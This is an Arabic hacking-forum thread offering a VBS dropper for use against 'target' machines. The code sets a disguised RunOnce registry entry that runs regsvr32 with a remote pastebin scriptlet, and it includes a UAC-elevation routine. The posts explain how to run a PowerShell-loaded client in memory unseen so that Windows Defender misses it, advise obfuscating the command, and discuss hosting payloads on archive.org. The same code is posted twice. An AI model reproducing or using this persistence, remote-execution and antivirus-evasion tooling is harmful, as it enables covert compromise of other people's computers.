19.01.2018 [ byte 500 ] تشغيل البايت اراي مباشرة بالذاكرة بدون وجوده بالهارد [VBS]


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

الحالة
مغلق و غير مفتوح للمزيد من الردود.

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,532
2,886
1
حياكم الله ياشباب
بعد مانزل الاخ مستر زيرو موضوع هنا
hack with reg or just run process
حطيت سكربت VBS يقوم بتسجيل الكوماند بRunOnce
هنا السكربت لمن يريد
كلين فايروس توتال
CSS:
Option Explicit
'~ On Error Resume Next
Dim objReg
Set objReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", "Windows Tasks Manger Updates", "REG_SZ", "C:\Windows\system32\regsvr32.exe /s /u /i:https://pastebin.com/raw/ scrobj.dll"
Function RegWrite(reg_keyname, reg_valuename,reg_type,ByVal reg_value)
    Dim aRegKey, Return
    aRegKey = RegSplitKey(reg_keyname)
    If IsArray(aRegKey) = 0 Then
        RegWrite = 0
        Exit Function
    End If
    Return = RegWriteKey(aRegKey)
    If Return = 0 Then
        RegWrite = 0
        Exit Function
    End If
    Select Case reg_type
        Case "REG_SZ"
            Return = objReg.SetStringValue(aRegKey(0),aRegKey(1),reg_valuename,reg_value)
        Case Else
            RegWrite = 0
            Exit Function
    End Select
    If (Return <> 0) Or (Err.Number <> 0) Then
        RegWrite = 0
        Exit Function
    End If
    RegWrite = 1
End Function
Function RegWriteKey(RegKeyName)
    Dim Return
    If IsArray(RegKeyName) = 0 Then
        RegKeyName = RegSplitKey(RegKeyName)
    End If
    If (IsArray(RegKeyName) = 0) Or (UBound(RegKeyName) <> 1) Then
        RegWriteKey = 0
        Exit Function
    End If
    Return = objReg.CreateKey(RegKeyName(0),RegKeyName(1))
    If (Return <> 0) Or (Err.Number <> 0) Then
        RegWriteKey = 0
        Exit Function
    End If
    RegWriteKey = 1
End Function
Function RegSplitKey(RegKeyName)
    Dim strHive, strInstr, strLeft
    strInstr=InStr(RegKeyName,"\")
    If strInstr = 0 Then Exit Function
    strLeft=left(RegKeyName,strInstr-1)
    Select Case strLeft
        Case "HKCU","HKEY_CURRENT_USER"    strHive = &H80000001
      Case Else Exit Function
    End Select
    RegSplitKey = Array(strHive,Mid(RegKeyName,strInstr+1))
End Function
Function RequireAdmin()
    Dim reg_valuename, WShell, Cmd, CmdLine, I
    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")_
    .EnumValues &H80000003, "S-1-5-19\Environment",  reg_valuename
    If IsArray(reg_valuename) <> 0 Then
        RequireAdmin = 1
        Exit Function
    End If
 
    Set Cmd = WScript.Arguments
    For I = 0 to Cmd.Count - 1
        If Cmd(I) = "/admin" Then
            WScript.Quit
        End If
        CmdLine = CmdLine & Chr(32) & Chr(34) & Cmd(I) & Chr(34)
    Next
    CmdLine = CmdLine & Chr(32) & Chr(34) & "/admin" & Chr(34)
 
    Set WShell= WScript.CreateObject( "WScript.Shell")
    CreateObject("Shell.Application").ShellExecute WShell.ExpandEnvironmentStrings(_
    "%SystemRoot%\System32\WScript.exe"),Chr(34) & WScript.ScriptFullName & Chr(34) & CmdLine, "", "runas"
    WScript.Quit
End Function
المهم فتحت نفسي عالـVBS فعملت سكربت بسيط 500 بايت
بيقوم بتشغيل الكوماند لاين بشكل مخفي ومن ثم تشغيل الباور شيل من خلاله
وتمرير كوماند للباور شيل الكوماند هذا جبته من موضوعي
ByPass Windows Defender Run Your Server With PowerShell
استغنينا عن دالة داونلود سترينج اللي معاه فيها الويندوز ديفيندر مشكلة
وايضا استغنينا عن التحويل من بيس64 الى بايت كالمعتاد مشان ميجيبنا الويندوز ديفيندر
قمنا بجلب سكربت الباور شيل اللي بيحوي على فانكشن فيها بايتات الكلاينت ونقطة الادخال
وشغلنا الفانكشن بالجهاز الهدف "يعني مافيه بايتات ابدا بجهاز المستخدم
ولاملف الا سكربت الـVBS ومارح يتم كتابة بايتات ابدا -مش داونلودر هذا اوك .؟"
حسب ماشفت وجربت من فترة كل مجرب سكربت vbs او js بشغلو الباور شيل بخفاء "على اساس"
بتظهر الشاشة الزرقاء لحظة وبتختفي "هذا حسب تجربتي"
اما الان بطريقتنا هنا (لن تظهر ابدا) لانافذة الباور شيل ولاالكوماند لاين ..
الفحص كلين
Bashar Bachir.vbs | 0/38 | NoDistribute
ملاحظة: ايمت مانكشف انت عندك الكوماند سترينج
فينك تشفره وفينك تقسمه بمتغيرات وفينك تلعب فيه لعب
لتحميل المتطلبات "حطيت لكم اداة بتولد لكم البايتات لاتخافو "
كل شي بالفديو مذكور
وهنا كل شي رح يلزمك حتى اداة توليد البايتات من الكلاينت
لاتنسى تمحي اخر فاصلة بعد جلب القيم "ذكرت هالشي بالفديو"
كان فيني برمجيا شيلها بس عشان خليكم تشتغلو شوي :ssse:
للتحميل مع الفديو بالمرفقات
 

المرفقات

khaled

:: عضو جديد ::
9 نوفمبر 2018
20
23
0
حياكم الله ياشباب​

بعد مانزل الاخ مستر زيرو موضوع هنا​

hack with reg or just run process​

حطيت سكربت VBS يقوم بتسجيل الكوماند بRunOnce​

هنا السكربت لمن يريد​


CSS:
Option Explicit[/CENTER]

[CENTER]'~ On Error Resume Next[/CENTER]

[CENTER]Dim objReg[/CENTER]

[CENTER]Set objReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")[/CENTER]

[CENTER]RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce", "Windows Tasks Manger Updates", "REG_SZ", "C:\Windows\system32\regsvr32.exe /s /u /i:https://pastebin.com/raw/ scrobj.dll"[/CENTER]

[CENTER]Function RegWrite(reg_keyname, reg_valuename,reg_type,ByVal reg_value)[/CENTER]

[CENTER]    Dim aRegKey, Return[/CENTER]

[CENTER]    aRegKey = RegSplitKey(reg_keyname)[/CENTER]

[CENTER]    If IsArray(aRegKey) = 0 Then[/CENTER]

[CENTER]        RegWrite = 0[/CENTER]

[CENTER]        Exit Function[/CENTER]

[CENTER]    End If[/CENTER]

[CENTER]    Return = RegWriteKey(aRegKey)[/CENTER]

[CENTER]    If Return = 0 Then[/CENTER]

[CENTER]        RegWrite = 0[/CENTER]

[CENTER]        Exit Function[/CENTER]

[CENTER]    End If[/CENTER]

[CENTER]    Select Case reg_type[/CENTER]

[CENTER]        Case "REG_SZ"[/CENTER]

[CENTER]            Return = objReg.SetStringValue(aRegKey(0),aRegKey(1),reg_valuename,reg_value)[/CENTER]

[CENTER]        Case Else[/CENTER]

[CENTER]            RegWrite = 0[/CENTER]

[CENTER]            Exit Function[/CENTER]

[CENTER]    End Select[/CENTER]

[CENTER]    If (Return <> 0) Or (Err.Number <> 0) Then[/CENTER]

[CENTER]        RegWrite = 0[/CENTER]

[CENTER]        Exit Function[/CENTER]

[CENTER]    End If[/CENTER]

[CENTER]    RegWrite = 1[/CENTER]

[CENTER]End Function[/CENTER]

[CENTER]Function RegWriteKey(RegKeyName)[/CENTER]

[CENTER]    Dim Return[/CENTER]

[CENTER]    If IsArray(RegKeyName) = 0 Then[/CENTER]

[CENTER]        RegKeyName = RegSplitKey(RegKeyName)[/CENTER]

[CENTER]    End If[/CENTER]

[CENTER]    If (IsArray(RegKeyName) = 0) Or (UBound(RegKeyName) <> 1) Then[/CENTER]

[CENTER]        RegWriteKey = 0[/CENTER]

[CENTER]        Exit Function[/CENTER]

[CENTER]    End If[/CENTER]

[CENTER]    Return = objReg.CreateKey(RegKeyName(0),RegKeyName(1))[/CENTER]

[CENTER]    If (Return <> 0) Or (Err.Number <> 0) Then[/CENTER]

[CENTER]        RegWriteKey = 0[/CENTER]

[CENTER]        Exit Function[/CENTER]

[CENTER]    End If[/CENTER]

[CENTER]    RegWriteKey = 1[/CENTER]

[CENTER]End Function[/CENTER]

[CENTER]Function RegSplitKey(RegKeyName)[/CENTER]

[CENTER]    Dim strHive, strInstr, strLeft[/CENTER]

[CENTER]    strInstr=InStr(RegKeyName,"\")[/CENTER]

[CENTER]    If strInstr = 0 Then Exit Function[/CENTER]

[CENTER]    strLeft=left(RegKeyName,strInstr-1)[/CENTER]

[CENTER]    Select Case strLeft[/CENTER]

[CENTER]        Case "HKCU","HKEY_CURRENT_USER"    strHive = &H80000001[/CENTER]

[CENTER]      Case Else Exit Function[/CENTER]

[CENTER]    End Select[/CENTER]

[CENTER]    RegSplitKey = Array(strHive,Mid(RegKeyName,strInstr+1))[/CENTER]

[CENTER]End Function[/CENTER]

[CENTER]Function RequireAdmin()[/CENTER]

[CENTER]    Dim reg_valuename, WShell, Cmd, CmdLine, I[/CENTER]

[CENTER]    GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")_[/CENTER]

[CENTER]    .EnumValues &H80000003, "S-1-5-19\Environment",  reg_valuename[/CENTER]

[CENTER]    If IsArray(reg_valuename) <> 0 Then[/CENTER]

[CENTER]        RequireAdmin = 1[/CENTER]

[CENTER]        Exit Function[/CENTER]

[CENTER]    End If[/CENTER]

[CENTER][/CENTER]

[CENTER]    Set Cmd = WScript.Arguments[/CENTER]

[CENTER]    For I = 0 to Cmd.Count - 1[/CENTER]

[CENTER]        If Cmd(I) = "/admin" Then[/CENTER]

[CENTER]            WScript.Quit[/CENTER]

[CENTER]        End If[/CENTER]

[CENTER]        CmdLine = CmdLine & Chr(32) & Chr(34) & Cmd(I) & Chr(34)[/CENTER]

[CENTER]    Next[/CENTER]

[CENTER]    CmdLine = CmdLine & Chr(32) & Chr(34) & "/admin" & Chr(34)[/CENTER]

[CENTER][/CENTER]

[CENTER]    Set WShell= WScript.CreateObject( "WScript.Shell")[/CENTER]

[CENTER]    CreateObject("Shell.Application").ShellExecute WShell.ExpandEnvironmentStrings(_[/CENTER]

[CENTER]    "%SystemRoot%\System32\WScript.exe"),Chr(34) & WScript.ScriptFullName & Chr(34) & CmdLine, "", "runas"[/CENTER]

[CENTER]    WScript.Quit[/CENTER]

[CENTER]End Function


المهم فتحت نفسي عالـVBS فعملت سكربت بسيط 500 بايت​

بيقوم بتشغيل الكوماند لاين بشكل مخفي ومن ثم تشغيل الباور شيل من خلاله​

وتمرير كوماند للباور شيل الكوماند هذا جبته من موضوعي​

ByPass Windows Defender Run Your Server With PowerShell​

استغنينا عن دالة داونلود سترينج اللي معاه فيها الويندوز ديفيندر مشكلة​

وايضا استغنينا عن التحويل من بيس64 الى بايت كالمعتاد مشان ميجيبنا الويندوز ديفيندر​

قمنا بجلب سكربت الباور شيل اللي بيحوي على فانكشن فيها بايتات الكلاينت ونقطة الادخال​

وشغلنا الفانكشن بالجهاز الهدف "يعني مافيه بايتات ابدا بجهاز المستخدم​

ولاملف الا سكربت الـVBS ومارح يتم كتابة بايتات ابدا -مش داونلودر هذا اوك .؟"​

حسب ماشفت وجربت من فترة كل مجرب سكربت vbs او js بشغلو الباور شيل بخفاء "على اساس"​

بتظهر الشاشة الزرقاء لحظة وبتختفي "هذا حسب تجربتي"​

اما الان بطريقتنا هنا (لن تظهر ابدا) لانافذة الباور شيل ولاالكوماند لاين ..​

الفحص كلين​


ملاحظة: ايمت مانكشف انت عندك الكوماند سترينج​

فينك تشفره وفينك تقسمه بمتغيرات وفينك تلعب فيه لعب​

لتحميل المتطلبات "حطيت لكم اداة بتولد لكم البايتات لاتخافو "​

كل شي بالفديو مذكور​

وهنا كل شي رح يلزمك حتى اداة توليد البايتات من الكلاينت​

لاتنسى تمحي اخر فاصلة بعد جلب القيم "ذكرت هالشي بالفديو"​

كان فيني برمجيا شيلها بس عشان خليكم تشتغلو شوي :ssse:

للتحميل مع الفديو بالمرفقات​

المشكلة في موقع الرفع بعد شوي يحذف الصورة فينعطب السرفر
 
  • أعجبني
التفاعلات: BasharBachir

أبو خليل

مشارك
29 أكتوبر 2018
83
115
0
ما شاء الله كل حاجة تخطر ببالي اجدك
تنشرها كنت راح اطلب منك الفنكش
والتشفير هذه بذاتها اتذكرها من يومها في الديف

والجميل انك طورتها
 
  • أعجبني
التفاعلات: BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,532
2,886
1
اخي بشير لماذا لا يصل التبليغ علما ان نزعت الفاصلة في اخر السترينغ هل هو راجع ان الموقعhttps://up.top4top
حتي اني جربت https://www.upload.ee ولم يصل التبليغ فل ممكن وضع الكود بشكر مباشر لسهولة نسخةمن المنتدى
اهلا اخي الحبيب
ارفع على موقع archive.org
بالنسبة للاكواد موجودة بالمرفقات اخي الحبيب الكود كامل
 

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,532
2,886
1
ما شاء الله كل حاجة تخطر ببالي اجدك

تنشرها كنت راح اطلب منك الفنكش

والتشفير هذه بذاتها اتذكرها من يومها في الديف

والجميل انك طورتها
تسلم على كلامك الطيب اخي الحبيب
بعض مماعندكم
بالنسبة للمواقع لو شفت مشاركتي على ردي لمشاركة عضو تبين انه موقع مش كويس لاعاد تستخدموه "يعني الرابط مارح يشتغل"
وبالنسبة للموقع العربي حسب مشاركة عضو قال انه بيحذف الصورة بعد قليل
لهيك نصحتك بموقع اركايف
archive.org
 
  • أعجبني
التفاعلات: vivin

vivin

:: عضو جديد ::
19 نوفمبر 2018
24
27
0
تسلم على كلامك الطيب اخي الحبيب
بعض مماعندكم
بالنسبة للمواقع لو شفت مشاركتي على ردي لمشاركة عضو تبين انه موقع مش كويس لاعاد تستخدموه "يعني الرابط مارح يشتغل"
وبالنسبة للموقع العربي حسب مشاركة عضو قال انه بيحذف الصورة بعد قليل
لهيك نصحتك بموقع اركايف
archive.org
اخى برنامجك الخاص بالتحويل الى البايت اراى لا يعمل
عند فتحة يعطى رسالة خطا ثم ينغلق تلقائيا
 
  • أعجبني
التفاعلات: BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,532
2,886
1
اخى برنامجك الخاص بالتحويل الى البايت اراى لا يعمل
عند فتحة يعطى رسالة خطا ثم ينغلق تلقائيا
اعتقد من عندك اخي الحبيب ممكن مشكلة فريم وورك او شي
على كل فينك تجيب البايتات من خلال برنامج HxDشرحت عنه بكثير من مواضيعي ..المهم تجيب البايتات باي طريقة وبرمجيا تقدر تجيبهم كمان
ان شفت وقت اليوم بشرحلك كيف تطلع البايتات بس اعتقد انا شارح هالامر كثير ..
 
  • أعجبني
التفاعلات: vivin

vivin

:: عضو جديد ::
19 نوفمبر 2018
24
27
0
اعتقد من عندك اخي الحبيب ممكن مشكلة فريم وورك او شي
على كل فينك تجيب البايتات من خلال برنامج HxDشرحت عنه بكثير من مواضيعي ..المهم تجيب البايتات باي طريقة وبرمجيا تقدر تجيبهم كمان
ان شفت وقت اليوم بشرحلك كيف تطلع البايتات بس اعتقد انا شارح هالامر كثير ..
هل برنامج ال HXD بيخرج البايت اراي ؟ على الشكل دا 32,126,55,125 وهكذا
 
  • أعجبني
التفاعلات: BasharBachir

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,532
2,886
1
هل برنامج ال HXD بيخرج البايت اراي ؟ على الشكل دا 32,126,55,125 وهكذا
مابيهم الشكل ..اخي الحبيب ..خرجهم من الHxD رح يطلعو هيك 0x4D
 
  • أعجبني
التفاعلات: vivin
الحالة
مغلق و غير مفتوح للمزيد من الردود.

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك